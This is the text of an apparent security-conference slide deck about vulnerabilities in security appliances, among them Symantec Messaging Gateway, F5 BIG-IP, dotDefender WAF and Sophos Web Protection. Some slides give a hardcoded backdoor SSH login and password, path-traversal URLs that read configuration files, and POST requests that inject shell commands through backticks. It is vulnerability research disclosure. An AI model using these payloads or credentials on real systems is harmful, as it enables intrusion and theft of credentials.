1.3. (In)security Software
- 3. 3
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
- 4. 4
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
(in)Security Software
- 6. The answer
• Symantec Messaging Gateway
– Backdoor by design
Code execution
• F5 BIG-IP
– SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
– Format string vulnerability
Code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
6
(in)Security Software
- 7. The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
7
(in)Security Software
- 8. The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
8
(in)Security Software
- 9. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
9
(in)Security Software
- 10. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
10
(in)Security Software
- 11. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
11
(in)Security Software
- 12. The answer
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php
12
F5 BIG-IP <= 11.2.0
(in)Security Software
- 13. The answer
“... dotDefender is a web application security
solution (a Web Application Firewall, or WAF)
that offers strong, proactive security for your
websites and web applications ...“
Web Attack?
13
AppliCure dotDefender WAF <= 4.26
(in)Security Software
- 14. 14
The answer
• %MAILTO_BLOCK% - email entered in the “Email
address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
Looks nice…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
- 15. 15
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
- 16. 16
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
- 17. 17
The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8
d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101
Firefox/19.0"
Passwords!
(in)Security Software
- 18. 18
The answer
` POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget§ion=configuration&STYLE=<validsessid>&url=%60sle
ep%205%60
Diagnostic Tools
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
- 20. 20
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
- 21. 21
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
- 23. 23
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
- 24. Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Applicaton testing and Fuzzing
– Reverse engineering
– Source code analysis
• A short note on so called “security scanning”
tools
24
(in)Security Software
- 25. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
25
(in)Security Software
- 26. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
26
(in)Security Software
- 27. Vuln, where art thou?
*Move two matches to make it three equal squares
27
(in)Security Software
- 28. Vuln, where art thou?
*Move two matches to make it three equal squares
28
(in)Security Software
- 29. 29
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
- 30. 30
Sometimes it’s easier to find the vulnerability
than it might be expected . . .
*doesn’t exist yet
And now for something completely different
(in)Security Software